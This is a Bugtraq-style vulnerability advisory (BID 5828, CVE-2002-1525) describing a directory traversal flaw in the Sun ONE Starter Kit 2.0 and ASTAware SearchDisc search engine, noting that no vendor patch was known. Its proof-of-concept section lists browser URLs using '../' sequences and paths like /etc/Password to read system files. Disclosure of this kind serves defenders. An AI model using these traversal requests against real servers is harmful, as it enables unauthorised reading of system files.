Sun ONE Starter Kit / ASTAware SearchDisc Search Engine Directory Traversal Vulnerability
BID:5828
Info
Sun ONE Starter Kit / ASTAware SearchDisc Search Engine Directory Traversal Vulnerability
| Bugtraq ID: | 5828 |
| Class: | Input Validation Error |
| CVE: |
CVE-2002-1525 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 30 2002 12:00AM |
| Updated: | Jul 11 2009 05:06PM |
| Credit: | Discovery of this vulnerability credited to ET LoWNOISE <[email protected]>. |
| Vulnerable: |
Sun ONE Starter Kit 2.0 ASTAware SearchDisc 3.1 |
| Not Vulnerable: | |
Discussion
Sun ONE Starter Kit / ASTAware SearchDisc Search Engine Directory Traversal Vulnerability
A vulnerability has been reported for the Sun ONE Starter Kit 2.0 and ASTAware SearchDisc. The Starter Kit includes a search engine facility provided for easy information retrieval. The search engine included with the Starter Kit is a modified version of ASTAWare SearchDisc. Reportedly, the search engine is vulnerable to directory traversal attacks.
An attacker can use the information obtained through this manner to launch potentially destructive attacks against a vulnerable system.
This vulnerability affects both the Sun ONE Starter Kit and ASTAware SearchDisc.
A vulnerability has been reported for the Sun ONE Starter Kit 2.0 and ASTAware SearchDisc. The Starter Kit includes a search engine facility provided for easy information retrieval. The search engine included with the Starter Kit is a modified version of ASTAWare SearchDisc. Reportedly, the search engine is vulnerable to directory traversal attacks.
An attacker can use the information obtained through this manner to launch potentially destructive attacks against a vulnerable system.
This vulnerability affects both the Sun ONE Starter Kit and ASTAware SearchDisc.
Exploit / POC
Sun ONE Starter Kit / ASTAware SearchDisc Search Engine Directory Traversal Vulnerability
This issue can be exploited with a web browser. The following proof of concepts were provided:
http://target:6015/../../../../../
http://target:6016/../../../../../
http://SearchDisk:6017/etc/Password
http://SearchDisk:6017/etc/Root
This issue can be exploited with a web browser. The following proof of concepts were provided:
http://target:6015/../../../../../
http://target:6016/../../../../../
http://SearchDisk:6017/etc/Password
http://SearchDisk:6017/etc/Root
Solution / Fix
Sun ONE Starter Kit / ASTAware SearchDisc Search Engine Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Sun ONE Starter Kit / ASTAware SearchDisc Search Engine Directory Traversal Vulnerability
References:
References:
- Homepage (ASTAware Technologies Inc.)
- Sun[tm] ONE Starter Kit (Sun Microsystems)